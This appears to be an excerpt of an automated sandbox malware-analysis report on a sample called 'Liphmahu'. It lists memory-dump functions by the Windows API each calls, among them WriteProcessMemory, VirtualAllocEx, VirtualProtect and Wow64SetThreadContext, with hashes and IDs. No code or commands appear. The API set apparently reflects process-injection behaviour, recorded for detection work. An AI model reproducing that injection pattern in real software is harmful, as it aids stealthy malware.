Instruction ID: 9f3123881e4208336cbc44ca9f19a3f996ac074be2e3adcdc22375b1ce3e2d8f
Opcode Fuzzy Hash: 4ca699f15fcbfdce150ee6ebb36fe6c1f07dad35e699f840271ea842240d6c44
Instruction Fuzzy Hash: CA519A70D4036A9FDB50DFA9C8857EEBBF1FF48310F148129E855AB294DB749881CB81

Function 06A24568 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 06A246AD

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 6d2c49dead5200cdff62ae39fe90a68f648a0e6d1481e280dd60221758a6ca83
Instruction ID: a5bd3357d8a5b1cccbdf383bfe55bc14f8de124fc958586562ae50a81e1f7696
Opcode Fuzzy Hash: 6d2c49dead5200cdff62ae39fe90a68f648a0e6d1481e280dd60221758a6ca83
Instruction Fuzzy Hash: 6D519A71D4036A8FDB50EFA9C8857AEBBF1FF48310F148129E855EB284DB749881CB81

Function 06A25315 Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06A25409

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 75d25732f2286da884dfb736d68f605532aff808f79c84f849fa24e01225a9b6
Instruction ID: 7bcf938c9bd5502955e0e6945abba88f04d883c0f43bd8a2df1bb1b296dd0b55
Opcode Fuzzy Hash: 75d25732f2286da884dfb736d68f605532aff808f79c84f849fa24e01225a9b6
Instruction Fuzzy Hash: CE415871D4022A9FDB10DFA9C985BDEFBB2FF48310F148429E855AB254C7759481CF81

Function 06A25320 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06A25409

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d02d379d9ad7d8dbfb4848f71f725ea0ae490f69a494a63a0a27cb397c55cc98
Instruction ID: c0a85c95efb1231101908470d2cb559ca54528e1db65c587b764cb72c1febc59
Opcode Fuzzy Hash: d02d379d9ad7d8dbfb4848f71f725ea0ae490f69a494a63a0a27cb397c55cc98
Instruction Fuzzy Hash: CD4165B1D0026A9FDB10DFA9C985BDEFBF2FF08310F148429E855AA254DB759891CF81

Function 0091CCCF Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3ea721c709a5bb4160b7274b75dbc01d56272897d8aee35f129c55ad562615d6
Instruction ID: 9a1ffbd4b157695f454d3c5f530004a4be7042d7054f8ef1ecda07fe91bd6147
Opcode Fuzzy Hash: 3ea721c709a5bb4160b7274b75dbc01d56272897d8aee35f129c55ad562615d6
Instruction Fuzzy Hash: CD419FB4B807448FEB109F60F8597A97BA9F759311F10886AFD059B3C9DBB48806CF10

Function 06A25BB0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A25C44

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 452504a7aecc054041620d25c97317ffb44882678b978810b39c3a877455ba88
Instruction ID: 1c264b2f76eecb3a1fe1c88ebe9d5997f720ee254ab3947b1892eb72f52d310c
Opcode Fuzzy Hash: 452504a7aecc054041620d25c97317ffb44882678b978810b39c3a877455ba88
Instruction Fuzzy Hash: 072157718002599FCB10DFAAC881AEEBFF5FF48320F10842AE959A7250D7399954DBA5

Function 05D8EAB9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D8EB50

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a926da69d17ee4328990902ac168bd7b60b1ab2aebd6cb2e41845ec934c1ed4b
Instruction ID: 5e048d84dbdb59fcc3eae581941d9c80a5c968ec84f662de4b0841ea4fd6082c
Opcode Fuzzy Hash: a926da69d17ee4328990902ac168bd7b60b1ab2aebd6cb2e41845ec934c1ed4b
Instruction Fuzzy Hash: AD212AB19003599FCB10DFA9C985BEEBBF5FF48320F14842AE959A7250C778A544CFA4

Function 05D8EAC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D8EB50

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ac2c7fe28d70624c9569e32131ed7d0d477f9ecf74b88ddee9e3f974c714a3a5
Instruction ID: 3d8f2bd9310172a6c98fa4ea8415c28306e5b9bf647dff0e782232a74fa53ae7
Opcode Fuzzy Hash: ac2c7fe28d70624c9569e32131ed7d0d477f9ecf74b88ddee9e3f974c714a3a5
Instruction Fuzzy Hash: 1A212A719003599FCB10DFA9C885BEEBBF5FF48310F14842AE959A7250C774A544CFA4

Function 06A25BB8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A25C44

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b371300ecd7697a0f0b226ba4316416580981b9f64bb910e452315d7428646d9
Instruction ID: 8c86c9dfee4f53693b49600cfac63b6453da26cbeb0c661a3050c0f9d7524dfa
Opcode Fuzzy Hash: b371300ecd7697a0f0b226ba4316416580981b9f64bb910e452315d7428646d9
Instruction Fuzzy Hash: 92217871C002599FCB10DFAAC880BEEBBF5FF48320F10842AE958A7250D7389554DFA4

Function 06A2FDE0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A2FE66

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 231b8f2ec4a376a580c3f01c342d26740f47823434c291335f3c7a50d33fa3d5
Instruction ID: 28721d453295dec5ff46098b52673220fdd8013c3ff5de84494a0300055f7b4b
Opcode Fuzzy Hash: 231b8f2ec4a376a580c3f01c342d26740f47823434c291335f3c7a50d33fa3d5
Instruction Fuzzy Hash: C62125B1D003199FDB10DFAAC885BEEBFF5EB49324F108429D559A7241C7789944CFA4

Function 0091C7D4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 73f33f466b996ae6780f555c6c2e7e2f5e1edc1a64337f34a4a8c85c0c4b6ba9
Instruction ID: fdcecab76d488c734c1014d421d23fcce0152a89ee516eff34966fdf399650eb
Opcode Fuzzy Hash: 73f33f466b996ae6780f555c6c2e7e2f5e1edc1a64337f34a4a8c85c0c4b6ba9
Instruction Fuzzy Hash: B32114B5900308EFDB10CF9AD984ADEBBF8EB48320F10841AE958B3310D375A940CFA5

Function 0091CC08 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 37c23bf18ea2e970528e225bab3947f1f580470f74b797a96704b3ad6b14c317
Instruction ID: f7864c370bea375b1aa8b00ad5afa2f8e7adb73dff860874b9c1559f980ec1c7
Opcode Fuzzy Hash: 37c23bf18ea2e970528e225bab3947f1f580470f74b797a96704b3ad6b14c317
Instruction Fuzzy Hash: CF2114B59002489FDB10CFAAD984ADEBFF8EB48320F14845AE958A7310D374A941CFA5

Function 06A2FDE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A2FE66

Memory Dump Source

Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e2140d3a7ccaf016c562ca3f6b0f7a834aa7aa5603aa0f285d5ad5f09b743c49
Instruction ID: a0c11eebc96c95af7141a344ac934484cab291fee8e33c029a53e2a6395908c3
Opcode Fuzzy Hash: e2140d3a7ccaf016c562ca3f6b0f7a834aa7aa5603aa0f285d5ad5f09b743c49
Instruction Fuzzy Hash: CF213871D003198FDB10DFAAC8857EEBBF4EF49324F108429D559A7241C7789944CFA4

Function 05D89498 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D89514

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6bf4d42f93c0d58b34f1060d2adcc0517c0779f31dbcf3fe6c1e191f62910e9c
Instruction ID: dc77f286b7a1f3d6081d7aa2c249cdd21e14f2bc8341900c0aa3f54d3bdb09aa
Opcode Fuzzy Hash: 6bf4d42f93c0d58b34f1060d2adcc0517c0779f31dbcf3fe6c1e191f62910e9c
Instruction Fuzzy Hash: 782138718003099FDB10DFAAC885BEEFBF4EF48320F10842AD459A7250DB389545CFA1

Function 05D894A0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D89514

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2ce4bb90932e31bc2568a901826a6e91d627687f561ecf01cebf19b9bbd69e42
Instruction ID: 7a786ed06ec6670adec0732d2138c7266d45c36402a4816b393e2336f52a1e51
Opcode Fuzzy Hash: 2ce4bb90932e31bc2568a901826a6e91d627687f561ecf01cebf19b9bbd69e42
Instruction Fuzzy Hash: 3A2115B18002099FDB10DFAAC984BEEBBF4EF48320F10842AD459A7250D7789545CFA5

Function 067CFE70 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 067CFEE4

Memory Dump Source

Source File: 00000004.00000002.2215168226.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_Liphmahu.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 76633a93b0d6b90b5b709f0d6ec9552c06baef7c2d07b8a76f902a3f04f6685e
Instruction ID: 2b36e3ad787de0d2b6e896f8ad393314de9095f80bedae0316ce32a7535987b8
Opcode Fuzzy Hash: 76633a93b0d6b90b5b709f0d6ec9552c06baef7c2d07b8a76f902a3f04f6685e
Instruction Fuzzy Hash: 2A11F4B1D002499FCB10DFAAC984AAEFBF5EF48320F10842ED459A7250C779A944CFA5

Function 05D88402 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 05D88477

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d9c06785831d32497d463496a1dfbe8dc688262bfda601ae5555704f9d071303
Instruction ID: b8b96f8426f33e80c741f6ec59d137f79c8f1a4d8b1b950e72ee5abab98faf27
Opcode Fuzzy Hash: d9c06785831d32497d463496a1dfbe8dc688262bfda601ae5555704f9d071303
Instruction Fuzzy Hash: 8E114CB19003598FDB10DFAAC8857EEFFF9EB48324F14842AD455A7350CB35A944CBA4

Function 05D8E818 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D8E88E

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c97fb7f72e52ccd599692390d99641fd0f121b088d845d1d1e8993c27750dc61
Instruction ID: 8f88901d3af5c4e0e1d0f890f3bbb9b90787917a84ad2da00181cf460ae06124
Opcode Fuzzy Hash: c97fb7f72e52ccd599692390d99641fd0f121b088d845d1d1e8993c27750dc61
Instruction Fuzzy Hash: 56116A719003499FCB10DFAAC845BEEBFF5EF88324F10882AE555A7250C735A544CFA5

Function 05D88408 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 05D88477

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 212342803cd6584e48b1d6188aee2b0fc7989d1201df2a8c7be36d84b5b615f1
Instruction ID: ff6c2c81de413f2652b85281fde1ce2c7e604c683b85b53f4067724be40a29cc
Opcode Fuzzy Hash: 212342803cd6584e48b1d6188aee2b0fc7989d1201df2a8c7be36d84b5b615f1
Instruction Fuzzy Hash: C5114CB19003598FDB10DFAAC4447EEFFF9AB48324F14841AD455A7250C7359944CBA4

Function 05D8E820 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D8E88E

Memory Dump Source

Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 605f49b50a8c013458b68fa09053a600dfb5f7665d506962a5732636dd2ec3e5
Instruction ID: 3732da5e1598ac65a5a150709a24a073b536511e9ccb76eb4cc596858a1d37a3
Opcode Fuzzy Hash: 605f49b50a8c013458b68fa09053a600dfb5f7665d506962a5732636dd2ec3e5
Instruction Fuzzy Hash: 431137719002499FCB10DFAAC844BEEBFF9EF88324F10881AE555A7250C775A544CFA5

Function 00918E29 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00918E9D

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d7d2c07d981638ea98219e519795976f0864a3cb63ba80a863037929bafe8be2
Instruction ID: 2e333000b718e6629a9a9cfa767ca537548cde9a7fc7ac0173a55a2a156e5f9e
Opcode Fuzzy Hash: d7d2c07d981638ea98219e519795976f0864a3cb63ba80a863037929bafe8be2
Instruction Fuzzy Hash: 2911DCB1804388CFDB20DF58D4043EABFF8EB19314F144099D489A3642C3799A49CBA6

Function 00918E38 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00918E9D

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a8eb210eaddf536c7537f086a698a2af43f4f83aa168a469ecbdc2d213af7442
Instruction ID: 7b37263ced87c4022990c84fe25fc3ceb4d5672a3b5818277cc3731f9b31a8b7
Opcode Fuzzy Hash: a8eb210eaddf536c7537f086a698a2af43f4f83aa168a469ecbdc2d213af7442
Instruction Fuzzy Hash: 55119DB1900398CFDB20DF59C5043EEBFF8EB09314F148499D989A3241C379AA48CBA6

Function 0091A518 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0091A57E

Memory Dump Source

Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dc13fc553d6fcd2e3567e993db741921dbd56d7c76e8ff0f59c34746d4630148
Instruction ID: 0a9c53b6d66eba7ff911a6f8707b25fe7bfbbb09d7d3bd13a22946284c0f5439
Opcode Fuzzy Hash: dc13fc553d6fcd2e3567e993db741921dbd56d7c76e8ff0f59c34746d4630148
Instruction Fuzzy Hash: CF11E3B5D013498FCB10CF9AC444ADEFBF5EB48324F10845AD459A7210D379A945CFA5

Function 05D63950 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

Plkq, xrefs: 05D63B38

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: Plkq
API String ID: 0-177148220
Opcode ID: 6388a1ad1e8d6a80bb5f1d6ae6dd5995347394baa957b4bddf7e4ba946df97e1
Instruction ID: f2579a0dc9f21d973a57fdbd00c9062270767288ef9e1d3102165d6bba1a1e34
Opcode Fuzzy Hash: 6388a1ad1e8d6a80bb5f1d6ae6dd5995347394baa957b4bddf7e4ba946df97e1
Instruction Fuzzy Hash: F6911434B006148FDB14DF29C884A6ABBF6FF89310B1544AAE506DB3B5DB71ED42CB91

Function 05D67D90 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D67FBA

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: c6c690558ed616910dac7e64722d0b6ad3bca20e53e2c4f5fca0e55e8ce77ba6
Instruction ID: 4130523a04ffb9777c6a530fc9ade3cd5b3efa2021cc78bf6d7e5dfd3a9a8463
Opcode Fuzzy Hash: c6c690558ed616910dac7e64722d0b6ad3bca20e53e2c4f5fca0e55e8ce77ba6
Instruction Fuzzy Hash: 42A1CB34B10218DFCB04EFA4D998A9DB7B2FF88305F55855AE406AB365DB30EC46CB90

Function 05D6B5A0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D6B6B2

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 2374dd8a5b5ad99b5d17a04e8fb9a5b20c1a5ae9b4c861b0323f52241d25eec6
Instruction ID: 2a88b9598bcc30845b63060d5e2d9f345a6b5aabce9f1f9e6f1bf44777ccf001
Opcode Fuzzy Hash: 2374dd8a5b5ad99b5d17a04e8fb9a5b20c1a5ae9b4c861b0323f52241d25eec6
Instruction Fuzzy Hash: 21711C30B40214DFDB14DB68C994BAE7BB6EF88710F10846AE506AB395DF75DC42CB91

Function 05D6EC88 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

(oq, xrefs: 05D6EEA9

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: e99a73015ce365633ad2c650f159432aba54a9aa1f52905416184ed0dca69418
Instruction ID: 0bf252a0880f884cbf974651fac7dbb2064612ae5c319504685588b3be1571f3
Opcode Fuzzy Hash: e99a73015ce365633ad2c650f159432aba54a9aa1f52905416184ed0dca69418
Instruction Fuzzy Hash: 77716D34700614CFCB04EB68D4A8AAEB7B6FF88701F50856AD4069B3A4DF74ED46CB90

Function 05D4FC40 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

,oq, xrefs: 05D4FCA3

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: ,oq
API String ID: 0-651702701
Opcode ID: 0bce02fe694d3752e7033fdebe0ba82a8beb926e453204183f657d72ec78f697
Instruction ID: ce093b4a9c13c0bd93c9bd5f0851058bf9b7d0cf9233b4dfa5635693cfddcb1a
Opcode Fuzzy Hash: 0bce02fe694d3752e7033fdebe0ba82a8beb926e453204183f657d72ec78f697
Instruction Fuzzy Hash: D951AF357001159FCB04DF69D894AAEBBE6FF89310B15806AE905DB375DB31EC01CBA1

Function 05D4DDA8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

poq, xrefs: 05D4DE58

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: poq
API String ID: 0-1570044193
Opcode ID: e2c138a6dd4a8a5b2e9008c5f5efdb19560194f6b12882357d56fd1da206471b
Instruction ID: 1325c102d03dc37d80a5e9f4a2ef5a48c36afab20c52cdc367117cbb6097dd0e
Opcode Fuzzy Hash: e2c138a6dd4a8a5b2e9008c5f5efdb19560194f6b12882357d56fd1da206471b
Instruction Fuzzy Hash: AA514D76600104AFCB45AFA8C944D6A7FF7FF8C3147158099E2099B376DA32DC22EB91

Function 05D6CE98 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

(oq, xrefs: 05D6CFC4

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: 0de5ecc5d97a03348bad196ad53364c61a7edc4e0c54c3baed0a4ce0c145dee1
Instruction ID: d4c64b7356f8dd528700dfb7fc422936fca1682feb1dcaa67b394a645080dcb3
Opcode Fuzzy Hash: 0de5ecc5d97a03348bad196ad53364c61a7edc4e0c54c3baed0a4ce0c145dee1
Instruction Fuzzy Hash: 79416C72714244AFCB069FA8D814D597FB6FF89320B1680A6E605DB3B2DA32DC12DB51

Function 05D6BA39 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D6BA82

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 23ee70013d13e6a91986402a4f2761282b29a8baa47d901100a9ab7926edfdf6
Instruction ID: 52f89b541524a367908fec9505ebad3b286f9b80be787c5ff370049448ed5591
Opcode Fuzzy Hash: 23ee70013d13e6a91986402a4f2761282b29a8baa47d901100a9ab7926edfdf6
Instruction Fuzzy Hash: EA414030B106188FCB04AB68C868A6E77B7FF88704F50451BD4069B354DF74AC47DBA1

Function 05D4EDC2 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

(oq, xrefs: 05D4EDDC

Memory Dump Source

Source File: 00000004.00000002.2207982072.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d40000_Liphmahu.jbxd

Similarity

API ID:
String ID: (oq
API String ID: 0-3175707579
Opcode ID: 7eb22611071273a4f58df1a9790810890d0946ddcf55aecfed4fefb9ab3476c6
Instruction ID: 39ae4d5fd17561bce62a93d96810cd869b814a51a3ba8ee8bcbedbc9ce985fb0
Opcode Fuzzy Hash: 7eb22611071273a4f58df1a9790810890d0946ddcf55aecfed4fefb9ab3476c6
Instruction Fuzzy Hash: AF418A35A006169FCB00CF68C48496AFBB9FF49320B1586A6E425AB292D734F852CFD1

Function 05D6B440 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

4'kq, xrefs: 05D6B4F7

Memory Dump Source

Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 30b0cbd65125a3e0bf3cdacf270f52b8aec2d9055e80bff0c394ae7207561258
Instruction ID: 1ba93061803cdfb90672ea4806aeaa83fa530e62e2ecf3933ecbba2d41af7ac6
Opcode Fuzzy Hash: 30b0cbd65125a3e0bf3cdacf270f52b8aec2d9055e80bff0c394ae7207561258
Instruction Fuzzy Hash: BE318F313406149FD308DB28C969B6B77E6EFC8714F10446AE206CB3A5CE36EC42C790

